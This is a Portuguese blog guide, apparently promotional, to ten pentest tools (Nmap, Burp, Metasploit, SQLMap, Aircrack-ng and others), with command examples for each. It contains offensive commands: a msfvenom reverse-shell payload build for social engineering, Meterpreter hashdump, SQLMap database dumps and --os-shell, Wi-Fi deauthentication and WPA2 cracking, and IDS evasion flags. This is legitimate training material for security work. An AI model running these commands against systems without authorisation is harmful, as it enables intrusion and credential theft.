Top 10 Ferramentas de Pentest que Todo Profissional Deve Conhecer

Conheça as 10 ferramentas essenciais de pentest: Nmap, Burp Suite, Metasploit, SQLMap e mais. Guia com comandos e exemplos reais.

MundiX Team·21 de março de 2026·11 min de leitura

Top 10 Ferramentas de Pentest que Todo Profissional Deve Conhecer

No universo do teste de penetração, suas ferramentas são tão importantes quanto seu conhecimento. Dominar as ferramentas certas pode ser a diferença entre uma avaliação de segurança superficial e uma análise profunda que revela vulnerabilidades críticas. Neste guia, apresentamos as 10 ferramentas que todo pentester deve conhecer, com exemplos práticos de comandos e cenários de uso reais.

Visão Geral Rápida

#FerramentaCategoriaLicençaNível
1NmapScanner de redeOpen SourceTodos
2Burp SuiteTeste webFreemiumIntermediário
3MetasploitExploraçãoOpen SourceAvançado
4SQLMapInjeção SQLOpen SourceIntermediário
5WiresharkAnálise de redeOpen SourceTodos
6GobusterEnumeração webOpen SourceIniciante
7NiktoScanner webOpen SourceIniciante
8John/HashcatQuebra de senhasOpen SourceIntermediário
9Aircrack-ngRedes sem fioOpen SourceAvançado
10NucleiScanner modernoOpen SourceTodos

1. Nmap (Network Mapper)

O que faz: Scanner de rede e portas considerado o canivete suíço do pentester. Permite descobrir hosts ativos, portas abertas, serviços em execução, versões de software e até o sistema operacional do alvo.

Quando usar: Na fase de reconhecimento e varredura. Geralmente é a primeira ferramenta executada em qualquer pentest.

Comandos Essenciais

bash
# Scan rápido das 1000 portas mais comuns
nmap -sV alvo.com.br

# Scan completo de todas as portas com detecção de OS
nmap -A -T4 -p- alvo.com.br

# Scan silencioso (SYN scan) para evitar detecção
nmap -sS -Pn -T2 alvo.com.br

# Scan de vulnerabilidades usando scripts NSE
nmap --script vuln -p 80,443,8080 alvo.com.br

# Scan de uma rede inteira com saída em XML
nmap -sn 192.168.1.0/24 -oX rede_scan.xml

# Enumeração de serviços SMB
nmap --script smb-enum-shares,smb-enum-users -p 445 alvo.com.br

Prós: Extremamente versátil, comunidade ativa, scripts extensíveis (NSE), gratuito e open source. Contras: Scans completos podem ser lentos; pode ser detectado por IDS/IPS sem configuração adequada.

2. Burp Suite

O que faz: Plataforma integrada para teste de segurança de aplicações web. Funciona como proxy interceptador, permitindo capturar, analisar e modificar requisições HTTP/HTTPS entre o navegador e o servidor.

Quando usar: Em qualquer teste de aplicações web, desde autenticação até injeções e falhas de lógica de negócio.

Funcionalidades Principais

  • Proxy: intercepta e modifica requisições em tempo real
  • Scanner: (versão Pro) identifica vulnerabilidades automaticamente
  • Repeater: reenvia requisições modificadas para teste manual
  • Intruder: automatiza ataques como brute force e fuzzing
  • Decoder: codifica/decodifica dados em múltiplos formatos
  • Comparer: compara respostas para identificar diferenças sutis
bash
# Configuração do proxy no terminal (para ferramentas CLI)
export http_proxy=http://127.0.0.1:8080
export https_proxy=http://127.0.0.1:8080

# Teste de requisição via curl passando pelo Burp
curl -x http://127.0.0.1:8080 -k https://alvo.com.br/api/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":"teste123"}'

Prós: Interface intuitiva, scanner potente (Pro), extensível com plugins, padrão da indústria. Contras: Versão Community limitada, licença Pro custosa, consome bastante memória.

3. Metasploit Framework

O que faz: Framework de exploração de vulnerabilidades mais popular do mundo. Contém milhares de exploits, payloads, encoders e módulos auxiliares para testar a segurança de sistemas.

Quando usar: Na fase de exploração, para comprovar vulnerabilidades e demonstrar impacto real.

Comandos Essenciais

bash
# Iniciar o Metasploit
msfconsole

# Buscar exploits para um serviço
msf6> search type:exploit platform:linux apache

# Configurar e executar um exploit
msf6> use exploit/multi/http/apache_normalize_path_rce
msf6> set RHOSTS alvo.com.br
msf6> set RPORT 443
msf6> set SSL true
msf6> exploit

# Gerar payload para testes de engenharia social
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.10.1 LPORT=4444 -f exe > payload.exe

# Pós-exploração com Meterpreter
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump

Prós: Maior base de exploits, comunidade gigante, integração com outras ferramentas, gratuito (Community). Contras: Curva de aprendizado íngreme, pode ser detectado por antivírus, versão Pro é cara.

4. SQLMap

O que faz: Ferramenta automatizada para detecção e exploração de vulnerabilidades de injeção SQL. Suporta todos os principais bancos de dados (MySQL, PostgreSQL, Oracle, MSSQL, SQLite).

Quando usar: Quando suspeitar de SQL Injection em aplicações web.

Comandos Essenciais

bash
# Teste básico de SQL Injection
sqlmap -u "https://alvo.com.br/busca?q=teste" --batch

# Teste com cookie de sessão autenticada
sqlmap -u "https://alvo.com.br/perfil?id=1" \
  --cookie="PHPSESSID=abc123" --batch

# Enumerar bancos de dados
sqlmap -u "https://alvo.com.br/busca?q=teste" --dbs --batch

# Extrair tabelas de um banco específico
sqlmap -u "https://alvo.com.br/busca?q=teste" \
  -D nome_banco --tables --batch

# Dump de dados de uma tabela
sqlmap -u "https://alvo.com.br/busca?q=teste" \
  -D nome_banco -T usuarios --dump --batch

# Teste via requisição POST salva do Burp
sqlmap -r requisicao_burp.txt --batch --level=3 --risk=2

# Tentativa de obter shell no servidor
sqlmap -u "https://alvo.com.br/busca?q=teste" --os-shell --batch

Prós: Automatização completa, suporta múltiplos bancos, técnicas avançadas de bypass de WAF. Contras: Pode ser ruidoso (muitas requisições), WAFs modernos podem bloquear.

5. Wireshark

O que faz: Analisador de protocolos de rede que captura e inspeciona pacotes em tempo real. Permite analisar tráfego em profundidade, identificar comunicações suspeitas e entender o comportamento da rede.

Quando usar: Na análise de tráfego de rede, debugging de comunicações, identificação de dados em texto claro e análise forense.

Filtros Essenciais

bash
# Captura de pacotes via terminal com tshark
tshark -i eth0 -w captura.pcap -c 10000

# Filtrar tráfego HTTP
tshark -r captura.pcap -Y "http" -T fields \
  -e ip.src -e http.host -e http.request.uri

# Encontrar credenciais em texto claro
tshark -r captura.pcap -Y "http.request.method == POST" \
  -T fields -e http.file_data

# Filtrar por IP específico
tshark -r captura.pcap -Y "ip.addr == 192.168.1.100"

# Detectar consultas DNS suspeitas
tshark -r captura.pcap -Y "dns.qry.name contains alvo"

Prós: Análise granular de pacotes, suporte a centenas de protocolos, gratuito, interface gráfica rica. Contras: Complexo para iniciantes, captura de alto volume gera arquivos grandes.

6. Gobuster / Dirb

O que faz: Ferramentas de enumeração de diretórios e arquivos ocultos em servidores web. Utilizam wordlists para descobrir caminhos que não são linkados publicamente.

Quando usar: Na fase de reconhecimento web, para encontrar painéis administrativos, backups, APIs ocultas e arquivos sensíveis.

Comandos Essenciais

bash
# Enumeração de diretórios com Gobuster
gobuster dir -u https://alvo.com.br \
  -w /usr/share/wordlists/dirb/common.txt \
  -t 50 -o resultado_dirs.txt

# Enumeração de subdomínios
gobuster dns -d alvo.com.br \
  -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -t 50

# Enumeração com extensões específicas
gobuster dir -u https://alvo.com.br \
  -w /usr/share/wordlists/dirb/common.txt \
  -x php,txt,bak,sql,zip,old -t 30

# Enumeração de virtual hosts
gobuster vhost -u https://alvo.com.br \
  -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# Alternativa mais simples com Dirb
dirb https://alvo.com.br /usr/share/wordlists/dirb/common.txt

Prós: Rápido, suporta múltiplos modos (dir, dns, vhost), altamente configurável. Contras: Dependente da qualidade da wordlist, pode ser bloqueado por rate limiting.

7. Nikto

O que faz: Scanner de vulnerabilidades em servidores web. Verifica mais de 7.000 itens potencialmente perigosos, incluindo versões desatualizadas, arquivos de configuração expostos e falhas conhecidas.

Quando usar: Como scan inicial de servidores web para identificar configurações incorretas e vulnerabilidades conhecidas rapidamente.

Comandos Essenciais

bash
# Scan básico
nikto -h https://alvo.com.br

# Scan com autenticação básica
nikto -h https://alvo.com.br -id admin:senha123

# Scan de porta específica com SSL
nikto -h alvo.com.br -p 8443 -ssl

# Scan via proxy (Burp Suite)
nikto -h https://alvo.com.br -useproxy http://127.0.0.1:8080

# Salvar resultado em HTML
nikto -h https://alvo.com.br -Format htm -o resultado_nikto.html

# Scan com evasão básica de IDS
nikto -h https://alvo.com.br -evasion 1

Prós: Fácil de usar, banco de dados extenso de verificações, integração com outros scanners, gratuito. Contras: Muito ruidoso (facilmente detectável), pode gerar muitos falsos positivos, lento em comparação com alternativas modernas.

8. John the Ripper e Hashcat

O que fazem: Ferramentas de quebra de senhas. John the Ripper é versátil e suporta centenas de formatos de hash. Hashcat utiliza GPU para acelerar drasticamente a quebra.

Quando usar: Na pós-exploração, ao encontrar hashes de senhas que precisam ser quebrados para demonstrar impacto.

Comandos Essenciais

bash
# John the Ripper - crack de hashes Linux
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# John - identificar tipo de hash automaticamente
john --format=auto hashes.txt

# John - mostrar senhas quebradas
john --show hashes.txt

# Hashcat - crack com GPU (MD5)
hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# Hashcat - crack NTLM com regras
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt -r rules/best64.rule

# Hashcat - ataque de máscara (brute force inteligente)
hashcat -m 0 -a 3 hashes.txt '?u?l?l?l?d?d?d?s'

# Identificar tipo de hash com hashid
hashid '5f4dcc3b5aa765d61d8327deb882cf99'

Prós (John): Multiplataforma, suporta centenas de formatos, eficiente em CPU. Prós (Hashcat): Velocidade absurda com GPU, regras avançadas, suporte a clusters. Contras: Requer hardware potente para hashes fortes; wordlists grandes ocupam espaço significativo.

9. Aircrack-ng

O que faz: Suite completa para auditoria de redes sem fio. Inclui ferramentas para captura de pacotes, ataque a WEP/WPA/WPA2 e teste de segurança de redes Wi-Fi.

Quando usar: Em testes de segurança de redes sem fio, avaliação de configurações Wi-Fi e demonstração de vulnerabilidades em protocolos wireless.

Comandos Essenciais

bash
# Colocar interface em modo monitor
airmon-ng start wlan0

# Capturar pacotes de redes próximas
airodump-ng wlan0mon

# Capturar handshake de uma rede específica
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon

# Forçar desautenticação para capturar handshake
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Quebrar senha WPA2 com wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap

# Scan passivo de redes em todas as bandas
airodump-ng --band abg wlan0mon

Prós: Suite completa para wireless, amplamente documentado, gratuito, suporta múltiplos tipos de ataque. Contras: Requer adaptador Wi-Fi compatível com modo monitor; WPA3 é significativamente mais resistente.

10. Nuclei

O que faz: Scanner de vulnerabilidades moderno e rápido, baseado em templates YAML. Permite criar verificações personalizadas e compartilhar com a comunidade. Tornou-se uma das ferramentas mais populares nos últimos anos.

Quando usar: Em qualquer fase do pentest para verificações automatizadas. Especialmente poderoso para scan em larga escala e integração em pipelines de CI/CD.

Comandos Essenciais

bash
# Scan básico com todos os templates
nuclei -u https://alvo.com.br

# Scan com templates de severidade específica
nuclei -u https://alvo.com.br -severity critical,high

# Scan de múltiplos alvos
nuclei -l alvos.txt -severity critical,high -o resultados.txt

# Scan com templates específicos
nuclei -u https://alvo.com.br -t cves/ -t misconfigurations/

# Atualizar templates da comunidade
nuclei -update-templates

# Scan com rate limiting para evitar bloqueio
nuclei -u https://alvo.com.br -rate-limit 10 -concurrency 5

# Criar e usar template personalizado
nuclei -u https://alvo.com.br -t meus_templates/

Prós: Extremamente rápido, templates da comunidade atualizados constantemente, fácil de personalizar, integração com CI/CD. Contras: Falsos positivos em alguns templates da comunidade; requer curadoria de templates para resultados consistentes.

Como a IA Potencializa o Uso Dessas Ferramentas

Mesmo dominando todas as ferramentas acima, o pentester moderno pode se beneficiar enormemente de assistentes de IA. A plataforma MundiX Web, por exemplo, ajuda profissionais a:

  • Gerar comandos contextualizados: descreva seu cenário e receba o comando exato para cada ferramenta
  • Interpretar resultados: cole a saída de um Nmap scan ou SQLMap e receba uma análise detalhada
  • Encadear ferramentas: receba sugestões de qual ferramenta usar em seguida com base nos resultados
  • Aprender na prática: entenda o que cada flag e parâmetro faz enquanto executa seus testes

Dicas para Maximizar Suas Ferramentas

1. Automatize Pipelines

Combine ferramentas em scripts para automatizar fluxos completos:

bash
#!/bin/bash
# Pipeline básico de reconhecimento
ALVO=$1
echo "[*] Iniciando reconhecimento de $ALVO"

# Fase 1: Scan de portas
echo "[*] Executando Nmap..."
nmap -sV -sC -oN nmap_resultado.txt $ALVO

# Fase 2: Enumeração web (se porta 80/443 aberta)
echo "[*] Executando Gobuster..."
gobuster dir -u https://$ALVO -w /usr/share/wordlists/dirb/common.txt \
  -o gobuster_resultado.txt -q

# Fase 3: Scan de vulnerabilidades web
echo "[*] Executando Nikto..."
nikto -h https://$ALVO -o nikto_resultado.html -Format htm

# Fase 4: Nuclei para vulnerabilidades conhecidas
echo "[*] Executando Nuclei..."
nuclei -u https://$ALVO -severity critical,high -o nuclei_resultado.txt

echo "[+] Reconhecimento completo. Verifique os arquivos de saída."

2. Mantenha Tudo Atualizado

bash
# Atualizar Nuclei e templates
nuclei -update && nuclei -update-templates

# Atualizar Metasploit
msfupdate

# Atualizar banco de dados do Nikto
nikto -update

3. Documente Tudo

Registre cada comando executado e seu resultado. Isso facilita a elaboração do relatório final e garante reprodutibilidade dos achados.

Conclusão

Dominar essas 10 ferramentas fornece uma base sólida para qualquer profissional de pentest. Lembre-se que ferramentas são meios, não fins: o verdadeiro diferencial de um pentester está na capacidade de pensar como um atacante, entender o contexto de negócio e comunicar riscos de forma clara.

Comece pelas ferramentas mais simples (Nmap, Gobuster, Nikto), evolua para as mais complexas (Metasploit, Burp Suite) e nunca pare de praticar em ambientes controlados como HackTheBox e TryHackMe.

Comece Agora com MundiX

Não sabe qual comando usar? O MundiX Web gera comandos personalizados para todas essas ferramentas com base no seu cenário de teste. Descreva seu alvo e objetivo, e receba orientações passo a passo.

Acesse o MundiX Web e transforme seu workflow de pentest com o poder da inteligência artificial.

📤 Compartilhar & Baixar